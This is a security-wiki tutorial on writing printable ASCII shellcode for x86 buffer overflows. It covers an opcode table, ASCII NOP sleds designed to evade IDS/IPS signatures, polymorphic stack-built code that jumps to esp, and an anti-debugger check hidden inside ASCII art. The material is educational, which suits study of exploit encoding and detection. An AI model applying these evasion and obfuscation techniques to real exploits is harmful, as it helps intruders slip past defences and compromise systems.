
Ascii shellcode

From NetSec
Revision as of 17:38, 5 April 2012 by LashawnSeccombe (Talk | contribs) (Implementation)

Printable ascii shellcode is used to evade sanitizing on the network and software layers during buffer overflow exploitation.

Introduction

Ascii shellcode bypasses many character filters and is fairly easy to learn because many ascii instructions are only one or two bytes long. The smaller the instructions, the more easily they can be obfuscated and randomized. During many buffer overflows the buffer is limited to a very small writeable segment of memory, so it is often important to use the smallest possible combination of opcodes. In other cases more buffer space is available, and things like ascii art shellcode become plausible.

Available Instructions

Protip: The printable ascii shellcode character space consists of three main ranges, with symbols between them:
  • Lowercase alpha falls between 0x61 and 0x7a (a-z).
  • Uppercase alpha falls between 0x41 and 0x5a (A-Z).
  • Numeric space falls between 0x30 and 0x39 (0-9).
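
The three ranges above can be turned into a quick byte classifier. This is only an illustrative sketch; the helper names `is_printable` and `is_alphanumeric` are assumptions made for this example and do not come from any tool mentioned on this page.

```python
def is_printable(payload: bytes) -> bool:
    """True if every byte is a printable ASCII character (0x20-0x7e)."""
    return all(0x20 <= b <= 0x7E for b in payload)


def is_alphanumeric(payload: bytes) -> bool:
    """True if every byte falls in 0-9 (0x30-0x39), A-Z (0x41-0x5a) or a-z (0x61-0x7a)."""
    return all(
        0x30 <= b <= 0x39 or 0x41 <= b <= 0x5A or 0x61 <= b <= 0x7A
        for b in payload
    )


print(is_alphanumeric(b"jFX4FH5ooooP"))  # True
print(is_alphanumeric(b"S[T\\"))         # False: '[' and '\' are symbols
print(is_printable(b"S[T\\"))            # True
```

Symbols such as `[` and `\` are printable but sit between the alphanumeric ranges, which is why the two checks differ.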


ASCII Shellcode Table
ASCII Value Hex Opcode Assembly Equivalent
0 \x30 xor
1 \x31 xor
2 \x32 xor
3 \x33 xor
4 \x34 xor al, 0x## [byte]
5 \x35 xor eax, 0x######## [DWORD]
6 \x36 SS Segment Override
7 \x37 aaa
8 \x38 cmp
9 \x39 cmp
 : \x3a cmp
 ; \x3b cmp
< \x3c cmp al, 0x## [byte]
= \x3d cmp eax, 0x######## [DWORD]
> \x3e DS Segment Override
 ? \x3f aas
@ \x40 inc eax
A \x41 inc ecx
B \x42 inc edx
C \x43 inc ebx
D \x44 inc esp
E \x45 inc ebp
F \x46 inc esi
G \x47 inc edi
H \x48 dec eax
I \x49 dec ecx
J \x4a dec edx
K \x4b dec ebx
L \x4c dec esp
M \x4d dec ebp
N \x4e dec esi
O \x4f dec edi
P \x50 push eax
Q \x51 push ecx
R \x52 push edx
S \x53 push ebx
T \x54 push esp
U \x55 push ebp
V \x56 push esi
W \x57 push edi
X \x58 pop eax
Y \x59 pop ecx
Z \x5a pop edx
[ \x5b pop ebx
\ \x5c pop esp
] \x5d pop ebp
^ \x5e pop esi
_ \x5f pop edi
` \x60 pushad
a \x61 popad
b \x62 bound
c \x63 arpl
d \x64 FS Segment Override
e \x65 GS Segment Override
f \x66 16 Bit Operand Size
g \x67 16 Bit Address Size
h \x68 push 0x######## [dword]
i \x69 imul reg/mem with immediate to reg/mem
j \x6a push 0x## [byte]
k \x6b imul immediate with reg into reg
l \x6c insb es:[edi], [dx]
m \x6d insl es:[edi], [dx]
n \x6e outsb [dx], ds:[esi]
o \x6f outsl [dx], ds:[esi]
p \x70 jo 0x## [byte relative offset]
q \x71 jno 0x## [byte relative offset]
r \x72 jb 0x## [byte relative offset]
s \x73 jae 0x## [byte relative offset]
t \x74 je 0x## [byte relative offset]
u \x75 jne 0x## [byte relative offset]
v \x76 jbe 0x## [byte relative offset]
w \x77 ja 0x## [byte relative offset]
x \x78 js 0x## [byte relative offset]
y \x79 jns 0x## [byte relative offset]
z \x7a jp 0x## [byte relative offset]

Constructing your NOP Sled

Notice: Most modern day IPS systems are capable of recognizing ASCII NOP sleds due to their popularity in modern exploitation. Many IPS systems look for large strings of repeating characters. The solution to this problem is to make use of 'effective NOPs', instead of simply NOPs. Combine this with a randomization sequence and one can avoid IPS detection in a few simple steps.

Instructions

ASCII NOP Pairs (Figure 1)
ASCII Pair Hex Opcode Register Instructions Used Commonly Detected
AI \x41\x49  %ecx INC, DEC No
@H \x40\x48  %eax INC, DEC Yes
BJ \x42\x4A  %edx INC, DEC No
CK \x43\x4B  %ebx INC, DEC No
DL \x44\x4C  %esp INC, DEC No
EM \x45\x4D  %ebp INC, DEC No
FN \x46\x4E  %esi INC, DEC No
GO \x47\x4F  %edi INC, DEC No
The professor says
You can put the Pair in any order, e.g. AI, IA, @H, H@, as long as both characters are used the same number of times. You can even jumble them together. The above is only true when using INC and DEC NOPs exclusively.
ASCII NOP Pairs (Figure 2)
ASCII Pair Hex Opcode Register Instructions Used Commonly Detected
PX \x50\x58  %eax PUSH, POP No
QY \x51\x59  %ecx PUSH, POP No
RZ \x52\x5A  %edx PUSH, POP No
S[ \x53\x5B  %ebx PUSH, POP Yes
T\ \x54\x5C  %esp PUSH, POP Yes
U] \x55\x5D  %ebp PUSH, POP Yes
V^ \x56\x5E  %esi PUSH, POP Yes
W_ \x57\x5F  %edi PUSH, POP Yes
`a \x60\x61 ALL PUSHAD, POPAD Yes

Implementation

Notice: Proper combination of these instructions will work to evade repeating-character based IDS and IPS systems.

Other operations can be used as NOPs as well. Of course, these operations do actually do things. This doesn't matter a whole lot, as long as the register values are restored afterwards.

For example, '4' or 0x34 is:

<syntaxhighlight lang="asm">xor al, 0x??</syntaxhighlight>

On the other hand, '5', or 0x35, is:

<syntaxhighlight lang="asm">xor eax, 0x????????</syntaxhighlight>

So, if P5LULZX were to execute, nothing would happen other than a waste of cpu cycles. The assembly looks like:

<syntaxhighlight lang="asm">

 [intel]				[att sysV]
 push eax			        pushl %eax
 xor eax, 0x5a4c554c		        xorl $0x5a4c554c, %eax
 pop eax				popl %eax

</syntaxhighlight>
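
The push/xor/pop pattern can be checked with a small model of a 32-bit register. This is a minimal sketch, not an emulator; the function name `run_push_xor_pop` is an assumption made for this example. It also shows that the four bytes `LULZ`, read as a little-endian immediate, form the DWORD 0x5a4c554c.

```python
MASK = 0xFFFFFFFF


def run_push_xor_pop(eax: int, imm_bytes: bytes) -> int:
    """Model `push eax; xor eax, imm32; pop eax` on a 32-bit register."""
    imm = int.from_bytes(imm_bytes, "little")  # x86 immediates are little-endian
    stack = [eax]                # push eax
    eax = (eax ^ imm) & MASK     # xor eax, imm32 (value changes briefly)
    eax = stack.pop()            # pop eax (original value restored)
    return eax


print(hex(int.from_bytes(b"LULZ", "little")))      # 0x5a4c554c
print(hex(run_push_xor_pop(0xDEADBEEF, b"LULZ")))  # 0xdeadbeef
```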

The value of the %eax register is momentarily changed and then restored. That is not going to modify execution flow, save for the cpu cycle count. There are more examples of this too, if the goal is only to create effective NOPs. For example, PhLULZX5LULZX adds more bytes to the NOP sled:

<syntaxhighlight lang="asm">

 [intel]				[att sysV]
 push eax			        pushl %eax
 push 0x5a4c554c			pushl $0x5a4c554c
 pop eax				popl %eax
 xor eax, 0x5a4c554c		        xorl $0x5a4c554c, %eax
 pop eax				popl %eax

</syntaxhighlight>

PUSH/POP pairs can be mixed with INC/DEC instructions without much difficulty. Once a register has been pushed to the stack, anything can be done to its value before popping that register back off the stack.

Even arithmetic calculations can be used as long as the original values of the registers are restored. This preserves the environment for the executing shellcode.

In this example using the PUSH and POP instructions, PRQXYZQPRXYZ, the code simply re-arranges the register values and puts them back in the right place. Each group of pops has to undo the shuffle left by the previous group, otherwise two registers end up swapped.

The assembly is as follows:

<syntaxhighlight lang="asm">

 [intel]				[att sysV]
 push eax			        pushl %eax
 push edx			        pushl %edx
 push ecx			        pushl %ecx
 pop eax				popl %eax
 pop ecx				popl %ecx
 pop edx				popl %edx
 push ecx			        pushl %ecx
 push eax			        pushl %eax
 push edx			        pushl %edx
 pop eax				popl %eax
 pop ecx				popl %ecx
 pop edx				popl %edx

</syntaxhighlight>
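
Whether a PUSH/POP string really restores every register is easy to get wrong by hand, so it helps to model it. The sketch below is an assumption-laden toy (only four registers, no memory, hypothetical helper names `run` and `restores`), but it is enough to compare two orderings of the final pops.

```python
# Single-byte PUSH and POP characters for four general-purpose registers.
PUSH = {"P": "eax", "Q": "ecx", "R": "edx", "S": "ebx"}
POP = {"X": "eax", "Y": "ecx", "Z": "edx", "[": "ebx"}


def run(sequence, regs):
    """Apply PUSH/POP characters to a copy of regs; return (regs, leftover stack depth)."""
    regs = dict(regs)
    stack = []
    for ch in sequence:
        if ch in PUSH:
            stack.append(regs[PUSH[ch]])
        elif ch in POP:
            regs[POP[ch]] = stack.pop()
        else:
            raise ValueError(f"unsupported character: {ch!r}")
    return regs, len(stack)


def restores(sequence):
    """True if every register and the stack depth end up unchanged."""
    start = {"eax": 0xA, "ecx": 0xC, "edx": 0xD, "ebx": 0xB}
    end, depth = run(sequence, start)
    return end == start and depth == 0


print(restores("PRQXYZQPRXYZ"))  # True
print(restores("PRQXYZQPRXZY"))  # False: ecx and edx end up swapped
```

The order of the last three pops matters: the stack is balanced in both strings, but only the first one puts every value back where it started.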

As far as the INC/DEC instructions are concerned, shellcode like ACBKJI leaves the %ecx, %edx, and %ebx registers completely unchanged. Therefore any register can be incremented any number of times so long as the register is decremented the same number of times.
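
The balancing rule can be checked mechanically by counting increments and decrements per register. A minimal sketch follows; the name `net_change` is an assumption made for this example, and the mapping comes straight from the instruction table (0x40-0x47 are INC, 0x48-0x4f are DEC).

```python
from collections import Counter

REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
INC = dict(zip("@ABCDEFG", REGS))  # 0x40-0x47
DEC = dict(zip("HIJKLMNO", REGS))  # 0x48-0x4f


def net_change(sequence):
    """Return the net increment per register, omitting registers that end unchanged."""
    delta = Counter()
    for ch in sequence:
        if ch in INC:
            delta[INC[ch]] += 1
        elif ch in DEC:
            delta[DEC[ch]] -= 1
        else:
            raise ValueError(f"not an INC/DEC byte: {ch!r}")
    return {reg: d for reg, d in delta.items() if d != 0}


print(net_change("ACBKJI"))  # {}
print(net_change("AAI"))     # {'ecx': 1}
```

An empty result means the sequence leaves register values untouched. Note that INC and DEC still update the arithmetic flags, which this sketch does not track.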

Protip: INC and DEC are single-byte instructions that cost very few cpu cycles (the exact cost depends on the CPU architecture) and are usually the highest performing instructions of those which are available. Using multiple combinations and implementations of this concept will yield a maximum IDS evasive effect.


Basic Encoding

Okay, so we see the ASCII instructions, but what can we do with them? It doesn't look like there are a lot of different instructions that are available, now does it? Using only ASCII, the smallest method to zero out the eax register is five bytes, jXX4X, examined below:

 Ascii	Machine Code	Assembly
 ----------------------------------------------
 jX	\x6a\x58	push byte 0x58
 X	\x58	        pop eax
 4X	\x34\x58	xor al, 0x58

If you look back to the explanation of the eax register, you'll see that the al register is the lowest (least significant) byte of eax. Let's look at that, line by line:

 Assembly	Action
 --------------------------------------------
 push 0x58	pushes 0x00000058 onto the stack (stored in memory as 58 00 00 00)
 pop eax	pops that value into eax, setting eax to 0x00000058
 xor al, 0x58	because al = 0x58, al now = 0x00, making eax = 0x00000000
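
The same three steps can be traced in a few lines. This is a sketch that models only the register arithmetic; `sign_extend8` is a hypothetical helper reflecting the fact that a byte-sized PUSH immediate is sign-extended to a full DWORD.

```python
MASK = 0xFFFFFFFF


def sign_extend8(value: int) -> int:
    """Sign-extend an 8-bit immediate to 32 bits, as `push imm8` does."""
    return (value - 0x100 if value & 0x80 else value) & MASK


stack = []
stack.append(sign_extend8(0x58))                   # push 0x58 -> 0x00000058
eax = stack.pop()                                  # pop eax
eax = (eax & 0xFFFFFF00) | ((eax & 0xFF) ^ 0x58)   # xor al, 0x58 touches only the low byte
print(f"{eax:#010x}")  # 0x00000000
```

Because every printable byte is below 0x80, the sign extension always fills the upper three bytes with zeros, which is what makes the single-byte XOR sufficient here.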

XOR can sometimes be a serious inconvenience to programmers; it is not so much difficult as it is time consuming. The XOR instruction, also called the exclusive or instruction, does a bitwise comparison of two values. Remember how we went back down to binary earlier? We're going to have to do it again. If the two bits are the same, the corresponding bit is reset to 0. If the two bits are different, the corresponding bit is set to 1. For example, F xor 3:

 1111 F xor
 0011 3 =
 ------------
 1100 C

Any time you XOR something with itself, it becomes zero.

 1111 F xor	1001 9 xor
 1111 F =	1001 9 =
 ----------	----------
 0000 0	0000 0
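
These nibble examples can be reproduced directly with the `^` operator. A minimal sketch, with `xor_nibbles` as a made-up helper name:

```python
def xor_nibbles(a: int, b: int) -> str:
    """XOR two 4-bit values and return the result as a 4-digit binary string."""
    return f"{(a ^ b) & 0xF:04b}"


print(xor_nibbles(0xF, 0x3))  # 1100
print(xor_nibbles(0xF, 0xF))  # 0000
print(xor_nibbles(0x9, 0x9))  # 0000
```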

Right now, we are able to perform an ASCII-only XOR instruction on the one-byte al register. However, one byte will not always be enough, will it? As we already know, we are able to PUSH registers, POP registers, PUSH DWORD values, and XOR them. Let's review some important instructions:

 Ascii	Hex	Assembly		Operand Size
 ------------------------------------------------------------------
 h	\x68	push 0x########		DWORD
 5	\x35	xor eax, 0x########	DWORD
 4	\x34	xor al, 0x##		BYTE
 X	\x58	pop eax	
 j	\x6a	push 0x##		BYTE
 Q	\x51	push ecx 	
 P	\x50	push eax 	
 Y	\x59	pop ecx	
 Z	\x5a	pop edx	

So, a small example of ASCII to modify the entire DWORD value of the eax register and set the register value to zero is hLULZX5LULZ:

 Ascii	   Machine Code           Assembly
 hLULZ	   \x68\x4c\x55\x4c\x5a	  push 0x5a4c554c
 X	   \x58                   pop eax
 5LULZ	   \x35\x4c\x55\x4c\x5a   xor eax, 0x5a4c554c


And now we have XORed out the eax DWORD in 11 bytes.
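
The byte count and the zeroing effect can both be confirmed by slicing the string itself. This sketch assumes the layout shown in the table above (opcode byte, then a four-byte little-endian immediate) and only models the arithmetic.

```python
payload = b"hLULZX5LULZ"

push_imm = int.from_bytes(payload[1:5], "little")   # operand of push (0x68)
xor_imm = int.from_bytes(payload[7:11], "little")   # operand of xor eax (0x35)

eax = push_imm          # push imm32 / pop eax
eax ^= xor_imm          # xor eax, imm32 with the same value

print(len(payload))     # 11
print(hex(push_imm))    # 0x5a4c554c
print(eax)              # 0
```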

An introduction to Polymorphic Shellcode

Alright, so we want to clear out the eax register, set it to all NOPs (0x90) and push it onto the stack, using nothing but ASCII. We can't use the \x90 opcode, because the \x90 code does not live in the ASCII keyspace. So how do we go about this?

Polymorphic code refers to a piece of code's ability to change itself. Machine code can modify itself through any of the functions which allow modification of registers. Self-modifying code is generally used to prevent the reverse-engineer from understanding the code. This method of code obfuscation is quite common and is considered a standard in most targeted exploitations.

Polymorphic code is how we will push 0x90909090 onto the stack without referencing the actual value 0x90 a single time. In the shortest amount of bytes possible, the shellcode to do so is jFX4FH5ooooP (12 bytes), let's analyze that:

 Ascii	Machine Code	     Assembly
 jF	\x6a\x46             push 0x46
 X	\x58                 pop eax
 4F	\x34\x46             xor al, 0x46
 H	\x48                 dec eax
 5oooo	\x35\x6f\x6f\x6f\x6f xor eax, 0x6f6f6f6f
 P	\x50                 push eax

If you're still a little confused, let's break it down even further:

 Assembly	        Value of EAX Register
 push 0x46	
 pop eax               0x00000046
 xor al, 0x46          0x00000000
 dec eax               0xffffffff
 xor eax, 0x6f6f6f6f   0x90909090
 push eax

There are two things happening here which I have not yet covered thoroughly. The first one of these is the dec eax, or the \x48 instruction. Usually, dec simply decrements the affected register. However, when that register is already equal to 0x00000000, dec will go all the way back and set the register to 0xffffffff. The second thing is that XOR instruction. The XOR instruction in the above code does an exclusive or as follows:

 0xffffffff xor
 0x6f6f6f6f


The result is stored in eax, and eax is then PUSHed. Following the exclusive or instruction nybble by nybble, byte by byte:

 1111	1111	1111	1111	1111	1111	1111	1111	(FFFFFFFF) xor
 0110	1111	0110	1111	0110	1111	0110	1111	(6F6F6F6F) =
 ----	----	----	----	----	----	----	----	--------------
 1001	0000	1001	0000	1001	0000	1001	0000	(90909090)
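
The register trace above, including the wraparound of dec eax, can be replayed with 32-bit masking. This is a sketch of the arithmetic only; `trace` is a hypothetical helper name.

```python
MASK = 0xFFFFFFFF


def trace():
    """Return the value of eax after each step of jFX4FH5ooooP."""
    values = []
    eax = 0x46                                         # push 0x46 / pop eax
    values.append(eax)
    eax = (eax & 0xFFFFFF00) | ((eax & 0xFF) ^ 0x46)   # xor al, 0x46
    values.append(eax)
    eax = (eax - 1) & MASK                             # dec eax wraps from 0 to 0xffffffff
    values.append(eax)
    eax ^= int.from_bytes(b"oooo", "little")           # xor eax, 0x6f6f6f6f
    values.append(eax)
    return values


print([f"{v:#010x}" for v in trace()])
# ['0x00000046', '0x00000000', '0xffffffff', '0x90909090']
```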

Polymorphic code should consist of methods which place a random or common value into a register, and then XOR the register until the desired value has been reached. We can start the register value at any ASCII value, at 0x00000000, or at 0xffffffff, by XORing a register with itself, or by setting the register value to zero and then decrementing it.

Notice that this shellcode is 100% alphanumeric. There is, of course, non-ASCII and non-alphanumeric polymorphic code, which has far fewer restrictions than printable ASCII or alphanumeric bytecode.

Without ASCII limitations, we have several instructions, or "modifiers" that we can use for our morphing. Generally, any instruction that can be used to modify the value of a register, in relation to itself (anything other than moving a value into a register) is considered a modifier. Modifiers, including ASCII modifiers, are as follows:

  • add
  • sub
  • dec
  • inc
  • xor
  • or
  • and
  • not
  • imul
  • idiv

Now, several of those instructions are considered bitwise operations. Bitwise operations are instructions that set each result bit individually by comparing the corresponding bits of two values. The XOR instruction, which we have already covered, is a good example. The OR instruction is related: if either of the two bits is one, the corresponding bit is set to one. Only if both bits are zero is the corresponding bit set to zero. For example, 4 or E = E:

 0100 4 or
 1110 E =
 ----------
 1110 E

A few rules for OR and XOR that will help us keep track of things:

  1. Any time you xor a value with itself the result is 0
  2. Any time you xor a value with zero the result is the original value
  3. Any time you or a value with zero or with itself the result is the original value
  4. Any time you or a value with F the result is F
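
The behaviour of OR and XOR on single nibbles can be checked exhaustively, since there are only sixteen values. The sketch below is illustrative and uses a made-up function name, `check_rules`. It relies on the standard definitions: OR sets a bit if either input bit is set, XOR sets a bit if the input bits differ.

```python
def check_rules() -> bool:
    """Verify the basic OR/XOR identities for every 4-bit value."""
    for v in range(16):
        assert v ^ v == 0        # xor with itself gives zero
        assert v ^ 0 == v        # xor with zero gives the original value
        assert v | 0 == v        # or with zero gives the original value
        assert v | v == v        # or with itself gives the original value
        assert v | 0xF == 0xF    # or with F gives F
    return True


print(check_rules())      # True
print(f"{0x4 | 0xE:X}")   # E
print(f"{0x4 ^ 0xE:X}")   # A
```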

We have defined our valid instructions and how they can be used to modify register values. But what can modifying a few register values do for us, even if we replace them with instruction code? The answer is simple; we push each Byte of our shellcode onto the stack in reverse order, and then we JMP to esp. We are executing in stack space, and we've constructed our code backwards at esp because the stack grows backwards. Now we jump to esp, where we suddenly find ourselves at our newly-constructed code.

Let's start by using our twelve-byte ASCII NOP-constructing code jFX4FH5ooooP. We can actually leave that just the way it is because of the PUSH eax instruction at the end. Let's just add a JMP esp. You'll find that the app will execute the four NOPs before running itself into non-sensible instructions left on the stack as data. But wait! There's more!

What if we pushed the new code onto the stack backwards and then executed that? Holy hex! The code would construct its decryptor, decrypt the value 0x90909090, construct it onto the stack, and then execute the NOP sequence! Using this concept, we can actually construct and decrypt our code multiple times before the code is fully decrypted, constructed, or executed. This is done by manipulating the value of esp so that, as the values are pushed onto the stack, eventually esp runs into eip, and then executes in temporary execution and stack space.

The question is: when does this become overkill and performance-sacrificing versus efficient and anti-heuristic? Well, there are a few ways that we can manipulate the value of ESP. Just about any modifier is able to do so; however, to keep it mostly alphanumeric, we're going to have a few limitations. The main one is that the value we assign to the esp register must be relative in order to make ourselves run into our own code. For example, the popad instruction ('a' or 0x61) pops all registers. We've lost register data, but that's okay: we have now added 32 to the value of ESP. The pushad instruction works similarly, subtracting 32 from the value of ESP. Eventually, with enough tinkering, you should be able to figure out how to use instructions other than xor, including but not limited to ror, rol, shr, shl, add, sub, imul, idiv, and others.

Encoding Shellcode : Ascii Art

Relative jump offsets are restricted to values between 48 (0x30) and 122 (0x7a).

Let's start out with Koshi's 14 byte alphanumeric NtGlobalFlags Payload:

jpXV34dd3v09Fh je debugger present (in alpha, 't(operand)').

We'll want to exit if there's a debugger present.

But let's get onto the real fun, shall we?

 push 'p'                            # jp
 pop eax                             # X
 push esi                            # V
 xor esi, dword ptr ss:[esp]         # 34d  ([esp] now contains esi, so esi = 0)
 xor esi, dword ptr fs:[esi+0x30]    # d3v0 (loads the value at offset 0x30 into esi)
 cmp dword ptr ds:[esi+0x68], eax    # 9Fh  (compares the value at esi offset 0x68 with 0x70)

So for our beginning notes, we can be assured that the following must be sequential, and registers must be preserved:

V34dd3v0 - ESI must be zeroed, and NtGlobalFlags must be stored in ESI. ESI cannot be modified until eax is set to 0x70/'p' and then 9Fh is run as a comparison.

So let's see here, our comparisons are a little hacky. We can compare eax to a dword using the '=' opcode 0x3d; after that we're limited to the unpredictable 0x38-0x3b instructions. So, for sanity's sake, we'll use the '=' opcode here. Our other cmp operators will be reserved for future instructions, as they get a lot more complex.

So suppose we wanted to jump 0x30 (48) bytes ahead in pure ascii. The easy way to do this is by setting the value of the eax register to a controllable ascii DWORD. In our case, we'll use the string 'code':

hcodeX=codet0

Disassembled, this represents:

 push 'code'
 pop  %eax
 cmp 'code', %eax
 je 0x30
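
The string can be split back into its opcode and operand bytes to confirm the layout. This is a sketch that slices fixed positions by hand; it is not a disassembler.

```python
payload = b"hcodeX=codet0"

push_imm = int.from_bytes(payload[1:5], "little")   # operand of push imm32 (0x68, 'h')
cmp_imm = int.from_bytes(payload[7:11], "little")   # operand of cmp eax, imm32 (0x3d, '=')
je_offset = payload[12]                             # rel8 operand of je (0x74, 't')

print(len(payload))                    # 13
print(hex(push_imm), hex(cmp_imm))     # 0x65646f63 0x65646f63
print(je_offset, hex(je_offset))       # 48 0x30
```

Because the pushed and compared DWORDs are identical, the comparison always sets the zero flag, so the je behaves as an unconditional jump of 48 bytes.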

Let's get ourselves some ascii art. This ascii art is 80 bytes wide, so each line is 81 bytes including the newline (0x0a).

                      oooooooooo.              .o8                             
                      `888'   `Y8b            "888                             
ooo. .oo.    .ooooo.   888      888  .ooooo.   888oooo.  oooo  oooo   .oooooooo
`888P"Y88b  d88' `88b  888      888 d88' `88b  d88' `88b `888  `888  888' `88b 
 888   888  888   888  888      888 888ooo888  888   888  888   888  888   888 
 888   888  888   888  888     d88' 888    .o  888   888  888   888  `88bod8P' 
o888o o888o `Y8bod8P' o888bood8P'   `Y8bod8P'  `Y8bod8P'  `V88V"V8P' `8oooooo. 
                                                                     d"     YD 
                                                                     "Y88888P' 

Let's see which lines look the best for code insertion. The string 'hcodeX=codet0' is 13 bytes. We can start with a jump to the big string of o's at the top of the 'D' in Debug. The first 'o' is at row two, column 23. 81 + 23 = 104, or 0x68, the 'h' character:


hcodeX=codeth                                                                  
                      oooooooooo.              .o8                             
                      `888'   `Y8b            "888                             
ooo. .oo.    .ooooo.   888      888  .ooooo.   888oooo.  oooo  oooo   .oooooooo
`888P"Y88b  d88' `88b  888      888 d88' `88b  d88' `88b `888  `888  888' `88b
 888   888  888   888  888      888 888ooo888  888   888  888   888  888   888
 888   888  888   888  888     d88' 888    .o  888   888  888   888  `88bod8P'
o888o o888o `Y8bod8P' o888bood8P'   `Y8bod8P'  `Y8bod8P'  `V88V"V8P' `8oooooo.
                                                                     d"     YD
                                                                     "Y88888P'

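The row and column arithmetic used to pick the jump byte can be written as a small helper. This is a sketch under the article's own assumptions (81 bytes per line, offsets limited to 48 through 122); the name `jump_char` is made up for this example, and the helper only reproduces the arithmetic rather than verifying where a real jump would land.

```python
LINE_LEN = 81                  # 80 columns plus the newline
MIN_JUMP, MAX_JUMP = 48, 122   # printable offset range given earlier


def jump_char(rows_down: int, column: int) -> str:
    """Return the ASCII character whose value equals rows_down * 81 + column."""
    offset = rows_down * LINE_LEN + column
    if not MIN_JUMP <= offset <= MAX_JUMP:
        raise ValueError(f"offset {offset} is outside the usable jump range")
    return chr(offset)


print(jump_char(1, 23))  # h
```

Anything more than one full line plus 41 columns away exceeds 122 and is rejected, which is why longer hops have to be chained through intermediate landing spots.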
We have now jumped to the top of the D. So, going back to our shellcode, as long as we preserve eax, we can jump in the string '=codeth' which is 7 bytes, which lets us squeeze shellcode in spaces. Using our dword 'code' will actually let us tag our shellcode, serving as a tag on the next line in empty space. Because we can only jump 122 bytes, we can't get to a part of the ascii art with enough room. We can solve this problem by finding empty enough space to toss our jump code in, along with a little bit of the necessary shellcode:

hcodeX=codeth                                                                  
                      V34d=codet4              .o8                             
   d3v0=codet?        `888'   `Y8b            "888                             
ooo. .oo.    .ooooo.   888      888  .ooooo.   888oooo.  oooo  oooo   .oooooooo
`888P"Y88b  d88' `88b  888      888 d88' `88b  d88' `88b `888  `888  888' `88b
 888   888  888   888  888      888 888ooo888  888   888  888   888  888   888
 888   888  888   888  888     d88' 888    .o  888   888  888   888  `88bod8P'
o888o o888o `Y8bod8P' o888bood8P'   `Y8bod8P'  `Y8bod8P'  `V88V"V8P' `8oooooo.
                                                                     d"     YD
                                                                     "Y88888P'


We've actually gotten up to the ? mark, and all the way through the bit of code to store the PEB value into the %esi register using the string 'V34dd3v0' while maintaining our ability to jump around. Our next bit of code is going to be tricky. We'll have to jump 80 bytes to land at the top of our 'e'. From there we'll go to the lower top of the 'n', then to the middle of the 'e'. From there we go to the middle of the 'g', then to the bottom of the 'b', create an extra bottom on the 'D' to accentuate it, and jump to the bottom of the 'g' when we're finished. The end result, after calculating out the ascii, looks like:

hcodeX=codeth                                                                  
                      V34d=codet4              .o8                             
   d3v0=codeti        `888'   `Y8b            "888                             
ooo. .oo.    .ooooo.   888      888  =codet.   888oooo.  oooo  oooo   .oooooooo
`888codetn  d88' `88b  888      888 d88' `88b  d88' `88b `888  `888  888' `88b 
 888   888  888   888  888      888 88=codetk  888   888  888   888  888   888 
 888   888  888   888  888     d88' 888    .o  888   888  888   888  `=codet5' 
o888o o888o `Y8bod8P' o888bood8P'   `Y8bod8P'  `=codet0'  `V88V"V8P' `8oooooo. 
                     =codet|                                         d"     YD 
                                                                     "jpX9Fht?